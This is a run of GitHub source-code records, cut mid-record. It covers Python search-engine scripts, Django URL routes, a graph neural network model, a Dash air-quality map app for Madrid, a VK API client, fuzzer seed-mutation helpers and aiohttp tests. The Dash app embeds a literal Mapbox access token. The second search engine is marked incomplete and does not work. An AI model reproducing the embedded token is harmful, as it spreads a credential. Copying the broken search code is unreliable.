[]\r\nfor url in soup.findAll('a', href=True):\r\n url_list.append(url['href'])\r\n\r\n# import the vocab csv\r\nvocab = pd.read_csv(\"vocab.csv\")\r\nvocab = vocab.set_index(\"0\").to_dict()[\"Unnamed: 0\"]\r\nop = pd.read_csv(\"inverted_indices.csv\").transpose()\r\n\r\nsentence = \"lion king\"\r\n\r\nhtmls = []\r\nfor word in sentence.split(): # go trough each word in sentence and match the word with id's in vocab csv\r\n try:\r\n id = vocab[word]\r\n except KeyError:\r\n word = word[:-1] # sometimes the last letter of a word is droped when nltk library used because of an un known reason\r\n try: # to overcome this, the matching is done with eliminating the last letter\r\n id = vocab[word]\r\n except 
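The qq_authorize.py record above targets Python 2 (`urllib.quote` moved to `urllib.parse.quote` in Python 3). A sketch of the same authorize-URL construction as a standalone Python 3 helper: `quote_via=quote` with the default `safe=''` reproduces the record's `urllib.quote(self.redirect_uri, '')`, percent-encoding the slashes in the redirect URI.

```python
from urllib.parse import quote, urlencode

QQ_AUTHORIZE_URL = "https://graph.qq.com/oauth2.0/authorize"

def build_authorize_url(app_id, redirect_uri, state):
    # quote (rather than the default quote_plus) with safe=''
    # percent-encodes '/' as well, matching urllib.quote(uri, '').
    params = urlencode({
        'response_type': 'code',
        'client_id': app_id,
        'redirect_uri': redirect_uri,
        'state': state,
    }, quote_via=quote)
    return f"{QQ_AUTHORIZE_URL}?{params}"

print(build_authorize_url('100001', 'https://example.com/cb', 'xyz'))
```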
KeyError:\r\n continue\r\n\r\n doc = op.iloc[id].values[0].split()\r\n doc[0] = doc[0][1:]\r\n doc[-1] = doc[-1][:-1]\r\n htmls.append(set(doc))\r\n\r\n# use set intersection to get the documents containing all words\r\nintersection = set.intersection(*htmls)\r\n# create a results dataframe to store the info\r\nresults = pd.DataFrame({'Title': [], 'Intro': [], 'url': []})\r\ncounter = 0\r\nfor document in intersection:\r\n document = re.findall(r'\\d+', document)[0]\r\n\r\n soup = BeautifulSoup(open(\"movies\\\\article_\" + document + \".html\", encoding=\"utf8\"), \"html.parser\")\r\n # get title ( same in parse)\r\n title = soup.find(\"h1\").text\r\n # get intro (same in parse)\r\n Intro = \"\"\r\n par = soup.p # first paragraph of the html page\r\n while par.next_element.name != \"h2\" and par.next_element.name != \"h3\": # until a heading, combine all paragraphs\r\n if par.name == \"p\":\r\n Intro += par.get_text()\r\n par = par.next_element\r\n # get url ( same in fetch_urls)\r\n url = url_list[int(document)]\r\n results.loc[counter] = [title, Intro, url]\r\n counter += 1\r\n\r\nprint(results)\r\n############################################################################################################\r\n#SEARCH ENGINE 2 (NOT COMPLETED)\r\nfrom nltk.tokenize import word_tokenize, RegexpTokenizer\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem import PorterStemmer\r\nimport json\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\n\r\nwith open('C:/Users/Capp/Documents/Università/Magistrale/1-ADM/Homework3/inverted_indices_score.json', \"r\") as f: # Just use 'w' mode in 3.x\r\n inverted_indices=json.load(f)\r\nsentence=input()\r\ndef clean_text(sentence):\r\n stop_words = set(stopwords.words(\"english\"))\r\n tokens = RegexpTokenizer(r\"\\w+\")\r\n porter = PorterStemmer()\r\n stem_words = list(map(porter.stem, tokens.tokenize(sentence)))\r\n words = filter(lambda x: x not in string.punctuation, stem_words)\r\n cleaned_text = filter(lambda x: x not in stop_words, words)\r\n return string\r\n\r\nquery={}\r\nvectorizer=TfidfVectorizer()\r\nv=vectorizer.fit_transform(string)\r\nfor i in range(len(string)):\r\n query[string[i]]=''.join((str(v[i])[3:-5]).split())\r\n##\r\nl=[]\r\nfor el in string:\r\n se=set()\r\n for i in range(len(inverted_indices[el])):\r\n se=se|{inverted_indices[el][i][0]}\r\n l.append(se)\r\ndocs=l[0]\r\nfor i in range(1,len(l)):\r\n docs=docs&l[i-1]\r\n\r\nn={}\r\nd1={}\r\nd2={}\r\nfor doc in docs:\r\n for el in string:\r\n query[el]='0.'+query[el][2:len(query[el])]\r\n y=float(query[el])\r\n for i in range(len((inverted_indices[el]))):\r\n if inverted_indices[el][i][0]==doc:\r\n inv='0.'+inverted_indices[el][i][1][2:len(inverted_indices[el][i][1])]\r\n x=float(inv)\r\n if inverted_indices[el][i][0] not in n:\r\n n[inverted_indices[el][i][0]]=(x*y)\r\n else:\r\n n[inverted_indices[el][i][0]]+=(x*y) #Summation of numerator\r\n ##\r\n if inverted_indices[el][i][0] not in d1:\r\n d1[inverted_indices[el][i][0]]=x**2\r\n else:\r\n d1[inverted_indices[el][i][0]]+=x**2 #summation of first part denominator\r\n ##\r\n if inverted_indices[el][i][0] not in d2:\r\n d2[inverted_indices[el][i][0]]=y**2\r\n else:\r\n d2[inverted_indices[el][i][0]]+=y**2 #summation of second part denominator\r\n else:\r\n pass\r\nresults={} #A dictionary with all documents and relatives cosine similarity values\r\nfor el in n:\r\n try:\r\n results[el]=(n[el])/((d1[el])**(1/2))*((d2[el])**(1/2))\r\n except ZeroDivisionError:\r\n 
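The first engine's retrieval step above is a boolean AND over posting lists via `set.intersection`. The same core, stripped of the CSV string parsing, over a plain `term -> set of doc ids` dict:

```python
def boolean_and(query, inverted_index):
    # Collect the posting set for each query term that exists in the index.
    postings = [inverted_index[w] for w in query.split() if w in inverted_index]
    if not postings:
        return set()
    # Documents containing all terms = intersection of all posting sets.
    return set.intersection(*postings)

index = {"lion": {3, 7, 12}, "king": {7, 12, 40}}
print(boolean_and("lion king", index))  # {12, 7}
```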
continue\r\n","repo_name":"Capp18/ADM_HW3","sub_path":"workings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4769,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"24059222024","text":"#!/usr/bin/python\n# coding=utf-8\n\nfrom django.conf.urls import url\nfrom . import views\n\n#\n# 如上例,使用{% url 'detail' %} 可以根据polls.urls 中的name='detail' 来匹配。如果在同一个project下有多个app,其中都有name='detail' 时,又该如何匹配views呢?\n# 解决方法是,添加namespace到URLconf中,如在polls/urls.py 中添加: app_name = 'polls'\n\n# 本教程例子中,只有一个app也就是polls,但是在现实中很显然会有5个、10个、更多的app同时存在一个项目中。\n# Django是如何区分这些app之间的URL name呢?\n# 答案是使用URLconf的命名空间。在polls/urls.py文件的开头部分,添加一个app_name的变量来指定该应用的命名空间:\n#\n\napp_name = 'polls' # 关键是这行\nurlpatterns = [\n # ex: /polls/\n url(r'^$', views.index, name='index'),\n\n # ex: /polls/5/\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n # ex: /polls/5/results/\n url(r'^(?P[0-9]+)/results/$', views.results, name='results'),\n # ex: /polls/5/vote/\n url(r'^(?P[0-9]+)/vote/$', views.vote, name='vote'),\n]\n\n\n\n# URLconfs 中,正则表达式中的分组()作为参数传递给view,如url(r'^(?P[0-9]+)/$', views.detail, name='detail')\n#\n# 假如请求url为 polls/34/ 相当于调用detail(request,question_id='34')\n#\n# 分别访问一下url可见调用不同的view 函数进行相应\n#\n# http://localhost:8000/polls/\n#\n# http://localhost:8000/polls/34/\n# http://localhost:8000/polls/34/results/\n# http://localhost:8000/polls/34/vote/\n","repo_name":"baliguan163/python_web_tools","sub_path":"polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8819215419","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Time : 2020/5/17 10:05\n# Author : 未闻花名\n# Site : \n# File : models.py\n# Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom layer import DiffusionConvolution, Linear\n\nclass DCNN(nn.Module):\n def __init__(self, nfeat, nhop, nclass, dropout):\n super(DCNN, self).__init__()\n self.dcnn = DiffusionConvolution(nhop, nfeat)\n self.fc = Linear(nhop*nfeat ,nclass)\n self.dropout = dropout\n self.nhop = nhop\n\n def forward(self, x, convertmx): #x: N x F\n pb, pf = convertmx, convertmx\n\n for i in range(1, self.nhop):\n # pb = torch.spmm(pb, convertmx)\n pb = torch.mm(pb, convertmx)\n pf = torch.cat((pf, pb), dim=1)\n\n pf = pf.view((convertmx.size(0), self.nhop, convertmx.size(0))) #N x nhop x N\n x = F.tanh(self.dcnn(pf, x)) #N x nhop x F\n x = F.dropout(x, self.dropout, training=self.training)\n\n x = x.view((convertmx.size(0), self.nhop*x.size(-1))) #N x nhop*F\n # x = F.tanh(self.fc(x)) #N x c\n x = self.fc(x)\n return F.log_softmax(x, dim=1)\n\n\n\n\n\n\n","repo_name":"XgSuen/GCN","sub_path":"dcnn_code/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73401603432","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\nfrom dash.dependencies import Input, Output\nimport datetime as dt\nimport itertools\n\nimport numpy as np\nimport matplotlib.tri as tri\nimport import_data\n\nimport base64\nwith open(\"./assets/map.png\", \"rb\") as image_file:\n encoded_string = base64.b64encode(image_file.read()).decode()\n#add the prefix that plotly will want when using the string as source\nencoded_image = 
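The final scoring line of the second engine, `(n[el])/((d1[el])**(1/2))*((d2[el])**(1/2))`, evaluates left to right as `(n / sqrt(d1)) * sqrt(d2)`, multiplying by the query norm instead of dividing by it. Cosine similarity needs both norms in the denominator; a corrected loop over the record's own `n`, `d1`, `d2` accumulators:

```python
import math

results = {}
for el in n:
    # cosine(doc, query) = dot / (|doc| * |query|)
    denom = math.sqrt(d1[el]) * math.sqrt(d2[el])
    if denom:  # replaces the try/except ZeroDivisionError above
        results[el] = n[el] / denom
```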
\"data:image/png;base64,\" + encoded_string\n\ncompuestos = {\"Dióxido de Azufre\": 1, \"Monóxido de Carbono\" : 6, \"Monóxido de Nitrógeno\": 7, \"Dióxido de Nitrógeno\": 8, \"Partículas < 2.5 µm\": 9, \"Partículas < 10 µm\": 10, \"Óxidos de Nitrógeno\": 12, \"Ozono\": 14, \"Tolueno\": 20, \"Benceno\": 30, \"Etilbenceno\": 35, \"Metaxileno\": 37, \"Paraxileno\": 38, \"Ortoxileno\": 39}\nhoras = {\"1 AM\": \"H01\", \"2 AM\": \"H02\", \"3 AM\": \"H03\", \"4 AM\": \"H04\", \"5 AM\": \"H05\", \"6 AM\": \"H06\", \"7 AM\": \"H07\", \"8 AM\": \"H08\", \"9 AM\": \"H09\", \"10 AM\": \"H10\", \"11 AM\": \"H11\", \"12 AM\": \"H12\", \"1 PM\": \"H13\", \"2 PM\": \"H14\", \"3 PM\": \"H15\", \"4 PM\": \"H16\", \"5 PM\": \"H17\", \"6 PM\": \"H18\", \"7 PM\": \"H19\", \"8 PM\": \"H20\", \"9 PM\": \"H21\", \"10 PM\": \"H22\", \"11 PM\": \"H23\", \"12 PM\": \"H24\"}\n\ndata = import_data.generar_datos()\n\n# Obtenemos la última hora con datos distintos de 0\nfor i in range(len(horas)):\n if(sum(data[horas[list(horas.keys())[i]]].values) != 0):\n latest = i \n\ndef actualizar_datos(tiempo, variable):\n global datos, width, height, z, x, y, x_mean, y_mean\n\n datos = data.iloc[np.where(data.MAGNITUD == variable)[0], :]\n width = np.max(datos[\"lon\"])-np.min(datos[\"lon\"])\n height = np.max(datos[\"lat\"])-np.min(datos[\"lat\"])\n\n z = datos[tiempo].values\n if variable == 6:\n z = z * 1000\n\n x = datos[\"lon\"].values\n y = datos[\"lat\"].values\n y_mean = np.mean(y)\n x_mean = np.mean(x)\n\ndef interpolation(x, y, z):\n\n ngridx = 200\n ngridy = 200\n\n xi = np.linspace(np.min(x), np.max(x), ngridx)\n yi = np.linspace(np.min(y), np.max(y), ngridy)\n\n triang = tri.Triangulation(x, y)\n interpolator = tri.LinearTriInterpolator(triang, z)\n Xi, Yi = np.meshgrid(xi, yi)\n zi = interpolator(Xi, Yi)\n\n return(xi, yi, zi)\n\napp = dash.Dash()\napp.scripts.config.serve_locally=True\napp.css.append_css({\"external_url\": \"https://codepen.io/chriddyp/pen/dZVMbK.css\"})\nserver = app.server\n\n\nstyles = {\n 'pre': {\n 'border': 'thin lightgrey solid',\n 'overflowX': 'scroll'\n },\n 'header': {\n 'height': '60px',\n 'line-height': '60px',\n 'padding': '5px',\n 'padding-left': '10px',\n 'backgroundColor': '#333333'\n },\n 'title': {\n 'font-size': '26px',\n 'padding-left:': '10px',\n 'color': '#ffffff'\n },\n 'logo': {\n 'float': 'right',\n 'padding-left': '15px',\n 'padding': '10px'\n },\n 'plot': {\n 'border-width': '10px',\n 'border-left-style': 'solid',\n 'color': '#ffffff',\n 'backgroundColor': '#333333',\n 'padding' : '10px'\n }\n}\n\ncolors = {\n 'background': '#333333',\n 'text': '#ffffff',\n 'text2': '#706f6f'\n}\n\n\napp.layout = html.Div(style = {}, children =[\n html.Div(\n style = styles['header'], children = [\n html.Div(\n className='six columns',\n children = html.Div(style = styles['title'], children = 'Air Quality Madrid' )\n ),\n html.Div(\n className='six columns',\n children=html.Div(\n style = styles['logo'],\n children=[html.Img(src='https://www.madrid.es/assets/images/logo-madrid.png')])\n )\n ]),\n html.Div(\n children = [\n html.Div(\n style = {'color': colors['text'], 'backgroundColor': colors['background'], 'padding' : '10px'},\n className='two columns',\n children = [\n html.H5(\"Compuesto (µg/m³)\"),\n html.Div(\n style = {'color': colors['background']},\n children =\n dcc.Dropdown(\n id='variable',\n options=[{'label': i, \"value\": compuestos[i]} for i in compuestos],\n value=8,\n )\n ),\n html.H5(\"Hora\"),\n html.Div(\n style = {'color': colors['background']},\n children =\n 
dcc.Dropdown(\n id='time')\n ),\n html.Div([\n html.Div(id='live-update-text'),\n dcc.Interval(\n id='interval-component',\n interval=1000*60*30, # in milliseconds\n n_intervals=0\n )\n ]),\n html.Br(),\n html.A('Sobre esta app y los datos', href='https://github.com/crossvalidados/AQ_Madrid/blob/master/README.md', target=\"_blank\"),\n html.Br(),\n html.A('Código fuente', href='https://github.com/crossvalidados/AQ_Madrid', target=\"_blank\"),\n html.H6(\"Autores:\", style={'color': colors['text2'], 'font-size': '1em'}),\n html.H6(\"Manuel Bajo y Kevin Craig\", style={'color': colors['text2'], 'font-size': '1em'})\n\n\n ]),\n html.Div(\n className='five columns',\n style = styles['plot'],\n children = [\n html.H5(\"Mapa estaciones\"),\n dcc.Graph(id='map', animate=True)\n ]\n ),\n html.Div(\n className='five columns',\n style = styles['plot'],\n children = [\n html.H5(\"Mapa interpolación\"),\n html.Div(\n children = dcc.Graph(id='cont'))\n ]\n )\n ])\n])\n\n@app.callback(Output('live-update-text', 'children'),\n [Input('interval-component', 'n_intervals')])\ndef update_metrics(n):\n\n global data\n data = import_data.generar_datos()\n style = {'padding': '5px', 'fontSize': '16px'}\n return[]\n\n@app.callback(Output('time', 'options'),\n [Input('interval-component', 'n_intervals')])\ndef update_date_dropdown(name):\n global latest\n \n for i in range(len(horas)):\n if(sum(data[horas[list(horas.keys())[i]]].values) != 0):\n latest = i \n return [{'label': i, \"value\": horas[i]} for i in dict(itertools.islice(horas.items(), latest + 1))]\n\n@app.callback(Output('time', 'value'),\n [Input('time', 'options')])\ndef update_value_dropdown(available_options):\n\n return available_options[-1]['value']\n\n\n@app.callback(\n dash.dependencies.Output('cont', 'figure'),\n [dash.dependencies.Input('time', 'value'),\n dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('variable', 'value')])\n\ndef display_stores_over_time(time, n, variable):\n\n actualizar_datos(time, variable)\n\n xi, yi, zi = interpolation(x, y, z)\n\n return {\n 'data': [\n {\n 'x': xi,\n 'y': yi,\n 'z': zi,\n 'name': 'Open Date',\n 'type': 'contour',\n 'opacity': 0.35,\n 'line': {'width': 0},\n 'contours': {'coloring': 'fill'},\n 'connectgaps': True\n }\n ],\n 'layout': {\n 'margin': {'l': 40, 'r': 20, 't': 10, 'b': 30},\n 'xaxis': dict(\n autorange=True,\n title='Longitud',\n showgrid=False,\n zeroline=False,\n showline=False,\n ),\n 'yaxis': dict(\n autorange=True,\n title = 'Latitud',\n showgrid=False,\n tickangle=270,\n zeroline=False,\n showline=False,\n ),\n 'images': [dict(\n source=encoded_image,\n xref= \"x\",\n yref= \"y\",\n x= np.min(datos[\"lon\"]) - 0.05*width,\n y= np.max(datos[\"lat\"]) + 0.05*height,\n sizex= width + 0.1*width,\n sizey= height + 0.1*height,\n sizing= \"stretch\",\n opacity= 1,\n layer= \"below\")]\n }\n }\n\n\n@app.callback(\n dash.dependencies.Output('map', 'figure'),\n [dash.dependencies.Input('time', 'value'),\n dash.dependencies.Input('interval-component', 'n_intervals'),\n dash.dependencies.Input('variable', 'value')])\n\ndef display_map(time, n, variable):\n\n actualizar_datos(time, variable)\n\n estacion = datos.iloc[np.where(datos.MAGNITUD == variable)[0], :][\"ESTACIÓN\"].values\n\n return {\n 'data': [{\n 'lat': y.flatten(),\n 'lon': x.flatten(),\n 'type': 'scattermapbox',\n 'marker': {'size': 8, 'opacity': 0.8},\n 'text': estacion + ': ' + [str(i) for i in z],\n 'hoverinfo': \"text\",\n 'selected': {\n 'marker': {'color': '#85144b'}\n }\n }],\n 
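The `interpolation` helper in this app is plain matplotlib.tri; a standalone run on synthetic station data shows the scattered-to-grid step in isolation. Values outside the stations' convex hull come back masked.

```python
import numpy as np
import matplotlib.tri as tri

# Synthetic (lon, lat, value) samples standing in for the stations.
rng = np.random.default_rng(0)
x = rng.uniform(-3.8, -3.6, 30)   # longitudes
y = rng.uniform(40.3, 40.5, 30)   # latitudes
z = np.sin(x * 50) + np.cos(y * 50)

# Same steps as interpolation(): triangulate, then resample onto a grid.
triang = tri.Triangulation(x, y)
interpolator = tri.LinearTriInterpolator(triang, z)
Xi, Yi = np.meshgrid(np.linspace(x.min(), x.max(), 200),
                     np.linspace(y.min(), y.max(), 200))
zi = interpolator(Xi, Yi)          # masked array; masked outside the hull
print(zi.shape, np.ma.count_masked(zi))
```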
'layout': {\n 'mapbox': {\n 'center': {\n 'lat': y_mean,\n 'lon': x_mean\n },\n 'zoom': 10.5,\n 'pitch': 0,\n 'accesstoken': 'pk.eyJ1IjoibWJham9idWUiLCJhIjoiY2pyeTFuMWRrMHFwOTQ5b2E5b2E3Y3NleiJ9.0UXhwZBeHtsd7SPe_0E0QQ'\n },\n 'margin': {'l': 0, 'r': 0, 't': 0, 'b': 0}\n }\n }\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n\n\n","repo_name":"crossvalidados/AQ_Madrid","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71887619432","text":"\"\"\"\nhttps://oauth.vk.com/authorize?client_id=51420426&display=page&scope=stats.offline&response_type=token&v=5.131\n\"\"\"\n\nwith open(\"token.txt\", \"r\") as file_object:\n token = file_object.read().strip()\n\n# print(token)\n\nimport requests\nfrom pprint import pprint\n\n\n# URL = \"https://api.vk.com/method/users.get\"\n# params = {\n# \"user_ids\": \"1, 2\",\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"fields\": \"education, sex\"\n# }\n# res = requests.get(URL, params=params)\n# pprint(res.json())\n\n\n# получаем список групп по поисковому запросу\n# def search_group(query: str, sorting=0):\n# \"\"\"\n# 0 - сортировка по умолчанию\n# 1 - сортировка по скорости роста\n# 2 - отношение дневной посещаемости\n# 3 - отношение количества лайков к количеству пользователей\n# 4 - комментариев к количеству пользователей\n# 5 - записей в обсуждениях к количеству пользователей\n# \"\"\"\n# params = {\n# \"q\": query,\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"sort\": sorting,\n# \"count\": 300\n# }\n# resp = requests.get(\"https://api.vk.com/method/groups.search\", params).json()\n# response_data = resp[\"response\"][\"items\"]\n# return response_data\n#\n#\n# target_groups = search_group(\"python\")\n# pprint(target_groups)\n\n# # расширенная информация о группе\n# target_group_ids = \"1, 2, 3, 4, 5\"\n# params = {\n# \"access_token\": token,\n# \"v\": \"5.131\",\n# \"group_ids\": target_group_ids,\n# \"fields\": \"members_count, activity, description\"\n# }\n# resp = requests.get(\"https://api.vk.com/method/groups.getById\", params)\n# pprint(resp.json()[\"response\"])\n\n\n# теперь напишем класс для взаимодействия с VkAPI\nclass VkApiClient:\n CNT = 0\n\n def __init__(self, token: str, api_version: str, base_url: str = \"https://api.vk.com/\"):\n self.token = token\n self.api_version = api_version\n self.base_url = base_url\n\n def general_params(self):\n return {\n \"access_token\": self.token,\n \"v\": self.api_version,\n }\n\n def get_users_info(self, user_ids: str, fields: str):\n params = {\n \"user_ids\": user_ids,\n \"fields\": fields,\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/users.get\",\n params=params).json()\n\n def search_group(self, query: str, sorting: int = 0, count: int = 5):\n \"\"\"\n 0 - сортировка по умолчанию\n 1 - сортировка по скорости роста\n 2 - отношение дневной посещаемости\n 3 - отношение количества лайков к количеству пользователей\n 4 - комментариев к количеству пользователей\n 5 - записей в обсуждениях к количеству пользователей\n \"\"\"\n params = {\n \"q\": query,\n \"sort\": sorting,\n \"count\": count\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/groups.search\",\n params=params).json()[\"response\"][\"items\"]\n\n def additional_group_info(self, target_group_ids: str, fields: str):\n self.CNT += 1\n params = {\n \"group_ids\": target_group_ids,\n 
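The `images` entry in the contour figure's layout above stretches the base64 map under the plot. The same trick written with plotly.graph_objects, as a sketch meant to run inside this app's namespace (`interpolation`, `x`, `y`, `z`, and `encoded_image` come from the app; the masked grid is filled with NaN so `connectgaps` can bridge it):

```python
import plotly.graph_objects as go

xi, yi, zi = interpolation(x, y, z)          # helpers defined in the app
fig = go.Figure(go.Contour(x=xi, y=yi, z=zi.filled(float('nan')),
                           opacity=0.35, line_width=0, connectgaps=True))
fig.add_layout_image(
    source=encoded_image,                    # base64 data URI from the app
    xref="x", yref="y",
    x=float(xi.min()), y=float(yi.max()),    # top-left corner of the image
    sizex=float(xi.max() - xi.min()),
    sizey=float(yi.max() - yi.min()),
    sizing="stretch", opacity=1, layer="below",
)
fig.show()
```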
\"fields\": fields\n }\n params.update(self.general_params())\n return requests.get(f\"{self.base_url}/method/groups.getById\",\n params=params).json()[\"response\"]\n\n\nvk_client = VkApiClient(token=token, api_version=\"5.131\")\nfor _ in range(5):\n pprint(vk_client.additional_group_info(target_group_ids=\"1, 2, 3, 4, 5, 6\",\n fields=\"members_count, activity, description\"))\nprint(f\"Метод additional_group_info был использован {vk_client.CNT} раз за работу программы.\")","repo_name":"majkl84/Netology_new","sub_path":"Basics of the Python programming language/Working with classes using the VK API example/webinar.py","file_name":"webinar.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11454229131","text":"from variable import *\n\ndef mutateSeeds(seeds_content, mutate_mode, mutate_location=-1, mutate_content=None):\n # use rules to mutate seeds to produce a array to return\n mutate_str = \"\"\n ret_mutate_seeds = []\n if mutate_mode == MUTATE_MODE['each_char']:\n for leni in range(len(seeds_content)):\n for chari in range(0, 256):\n mutate_str = seeds_content[:leni] + chr(chari) + seeds_content[(leni + 1):]\n ret_mutate_seeds.append(mutate_str)\n elif mutate_mode == MUTATE_MODE['each_mutN']:\n for leni in range(len(seeds_content)):\n for chari in [0, 64, 128, 192, 255]:\n mutate_str = seeds_content[:leni] + chr(chari) + seeds_content[(leni + 1):]\n ret_mutate_seeds.append(mutate_str)\n elif mutate_mode == MUTATE_MODE['per_each_mutN']:\n for chari in [0, 64, 128, 192, 255]:\n mutate_str = seeds_content[:mutate_location] + chr(chari) + seeds_content[(mutate_location + 1):]\n ret_mutate_seeds.append(mutate_str)\n return ret_mutate_seeds\n\n\ndef gainCmpSetColor(dynamic_cmp_dict, next_dynamic_cmp_dict):\n temp_bytes_map_cmp_dict = {} # [{cmp_addr:[[type or location], [[value, next_value],[value, next_value]]], cmp_addr:[]},{...}] using array subscript as bytes location\n temp_cmp_map_bytes_set = set() # {cmp_addr:[bytes], cmp_addr:[]}\n for nkey, nvalue in next_dynamic_cmp_dict.items():\n if nkey in dynamic_cmp_dict:\n value = dynamic_cmp_dict[nkey]\n # first using len to judge change type, second using operands to judge\n # print(nvalue, value)\n if len(nvalue) > len(value):\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_GREATER], [value, nvalue]]\n temp_cmp_map_bytes_set.add(nkey)\n elif len(nvalue) < len(value):\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_LESS], [value, nvalue]]\n temp_cmp_map_bytes_set.add(nkey)\n else:\n temp = [[],[]]\n fflag = False\n for index in range(len(nvalue)):\n if value[index] != nvalue[index]:\n temp[0].append(index)\n temp[1].append([value[index], nvalue[index]])\n fflag = True\n if fflag:\n temp_bytes_map_cmp_dict[nkey] = temp\n temp_cmp_map_bytes_set.add(nkey)\n else:\n temp_bytes_map_cmp_dict[nkey] = [[NEXT_OVERSETP], [[-1], nvalue]]\n\n return temp_bytes_map_cmp_dict, temp_cmp_map_bytes_set\n","repo_name":"fengzhengzhan/STFGFuzz","sub_path":"pin_mode/fuzzeroperat.py","file_name":"fuzzeroperat.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"168016529","text":"import pytest\nimport ujson\nfrom aiohttp import StreamReader, web\n\nfrom hamcrest import assert_that, has_entries, instance_of, match_equality\n\nfrom mail.ipa.ipa.core.actions.import_.json import CreateImportFromJSONAction\nfrom mail.ipa.ipa.core.entities.enums import UserImportError\nfrom 
mail.ipa.ipa.core.entities.import_params import GeneralInitImportParams\nfrom mail.ipa.ipa.core.entities.password import Password\nfrom mail.ipa.ipa.core.entities.stat import ImportStat\nfrom mail.ipa.ipa.core.entities.user_info import UserInfo\n\n\nclass TestCreateImport:\n @pytest.fixture\n def task_id(self):\n return 3\n\n @pytest.fixture\n def import_params_json(self):\n return {\n 'server': 'server.test',\n 'port': 993,\n 'imap': 1,\n 'ssl': 0,\n 'mark_archive_read': 0,\n 'delete_msgs': 1,\n }\n\n @pytest.fixture\n def import_params(self, import_params_json, admin_uid, user_ip, org_id):\n return GeneralInitImportParams(\n server=import_params_json['server'],\n port=import_params_json['port'],\n ssl=bool(import_params_json['ssl']),\n delete_msgs=bool(import_params_json['delete_msgs']),\n mark_archive_read=bool(import_params_json['mark_archive_read']),\n imap=bool(import_params_json['imap']),\n admin_uid=admin_uid,\n user_ip=user_ip,\n org_id=org_id,\n )\n\n @pytest.fixture\n def request_params(self, admin_uid, user_ip, import_params_json):\n return {\n 'admin_uid': admin_uid,\n 'user_ip': user_ip,\n **import_params_json,\n }\n\n @pytest.fixture\n def data(self):\n return None\n\n @pytest.fixture\n async def response(self, app, headers, org_id, request_params, data):\n return await app.post(f'/import/{org_id}/',\n headers=headers,\n params=request_params,\n data=data)\n\n @pytest.fixture\n async def response_json(self, response):\n return await response.json()\n\n class TestCSV:\n @pytest.fixture(autouse=True)\n def create_import_from_csv_mock(self, mock_action, task_id):\n from mail.ipa.ipa.core.actions.import_.csv import CreateImportFromCSVAction\n return mock_action(CreateImportFromCSVAction, task_id)\n\n @pytest.fixture\n def data(self):\n return b'sample;csv'\n\n @pytest.fixture\n def csv_name(self):\n return 'csv-name'\n\n @pytest.fixture\n def request_params(self, request_params, csv_name):\n request_params['name'] = csv_name\n return request_params\n\n @pytest.fixture\n def headers(self):\n content_type = 'text/csv'\n return {'Content-Type': content_type}\n\n def test_create_import_from_csv_call(self,\n create_import_from_csv_mock,\n response,\n org_id,\n admin_uid,\n user_ip,\n import_params,\n csv_name,\n ):\n create_import_from_csv_mock.assert_called_once_with(\n name=csv_name,\n stream=match_equality(instance_of(StreamReader)),\n import_params=import_params,\n )\n\n def test_csv_response(self, response_json, task_id):\n assert_that(\n response_json,\n has_entries({\n 'status': 'success',\n 'data': has_entries({\n 'task_id': str(task_id),\n }),\n })\n )\n\n class TestSchemaErrorEmptyDomain:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['server'] = ''\n return request_params\n\n @pytest.mark.asyncio\n async def test_csv_empty_domain(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestSchemaErrorInvalidPort:\n @pytest.fixture\n def request_params(self, request_params):\n request_params['port'] = 65537\n return request_params\n\n @pytest.mark.asyncio\n async def test_csv_invalid_port(self, response_json):\n assert_that(\n response_json,\n has_entries({\n 'status': 'fail',\n })\n )\n\n class TestJSON:\n @pytest.fixture(autouse=True)\n def create_import_from_json_mock(self, mock_action):\n return mock_action(CreateImportFromJSONAction)\n\n @pytest.fixture\n def headers(self):\n return {'Content-Type': 'application/json'}\n\n @pytest.fixture\n def users(self, rands):\n return [\n 
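The tests in this record lean on PyHamcrest. A self-contained sketch of the two matchers doing the heavy lifting: `has_entries` checks a subset of keys, and `match_equality` wraps a matcher so it satisfies plain `==`, which is how `instance_of(StreamReader)` slips into `assert_called_once_with` above.

```python
from hamcrest import assert_that, has_entries, instance_of, match_equality

response = {'status': 'success', 'data': {'task_id': '3', 'extra': 1}}

# has_entries passes as long as the listed keys match; extra keys are fine.
assert_that(response, has_entries({
    'status': 'success',
    'data': has_entries({'task_id': instance_of(str)}),
}))

# match_equality makes a matcher usable anywhere plain == is applied.
assert match_equality(instance_of(str)) == 'task-3'
```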
